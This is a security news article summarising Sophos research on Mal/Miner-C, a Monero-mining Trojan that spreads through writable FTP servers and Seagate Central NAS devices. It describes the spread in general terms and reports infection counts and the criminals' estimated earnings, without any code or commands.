Sophos has conducted a detailed analysis of a piece of malware designed to abuse infected computers for cryptocurrency mining and discovered that the threat leverages network-attached storage (NAS) devices to spread.
The malware, detected by the security firm as Mal/Miner-C, leverages infected computers to mine Monero (XMR), an open source privacy-focused cryptocurrency which, unlike Bitcoin, can still be mined using regular computers. The threat is written in NSIS (Nullsoft Scriptable Install System), a scripting language used for creating Windows installers.
These types of Trojans are not unheard of. Last month, antivirus company Dr. Web reported spotting a Go-based Monero miner designed to target Linux systems.
What makes Mal/Miner-C interesting is the fact that it abuses FTP servers in an effort to spread to as many computers as possible. Some instances of the malware include a component, called tftp.exe, which randomly generates IP addresses and attempts to connect to them using a predefined list of usernames and passwords.
If it establishes a successful connection to an FTP service, the malware copies itself to that server and modifies the .html and .php files stored on it. The targeted web files are injected with code that generates an iframe referencing the malware. When users visit these infected webpages, they are presented with a “save file” dialog that serves the malicious files. If victims download and open these files, their systems will become infected with Mal/Miner-C.
Sophos identified over 1.7 million individual infections in the first half of 2016, but these instances only corresponded to 3,150 unique IP addresses. That is because the malware copies itself to every folder on an infected FTP server.
An Internet scan has showed that there are over 200,000 active FTP servers around the world that allow anonymous remote access, and more than 7,200 of them are not properly configured and have write access enabled. Of these, roughly 5,100 have already been infected with Mal/Miner-C.
While the malware has targeted various types of FTP servers, researchers noticed one particular device that is particularly susceptible to abuse. By default, Seagate’s Central NAS product provides a public folder that cannot be deleted or deactivated. If remote access is enabled on the device, attackers can easily plant the malware files in hopes that they will be executed by users once they are discovered.
While Mal/Miner-C cannot directly run on Seagate Central, the NAS device can be highly useful for spreading the malware, and Sophos believes that most of these systems have already been infected.
After analyzing the wallets used by the cybercriminals to store their profits, researchers determined that they received a total of roughly 58,000 XMR from the MoneroPool mining pool they used. The infected machines had calculated 431,000 hashes per second, which accounted for half of the total pool.
When Attila Marosi, senior threat researcher at Sophos, wrote the report on Mal/Miner-C, Monero was worth less than $2, which meant cybercriminals had earned roughly $86,000. However, the value of Monero spiked this month after a popular dark web marketplace called AlphaBay integrated the cryptocurrency. One unit of the digital currency is currently worth more than $13, which means that the profit made by the cybercriminals is significantly higher.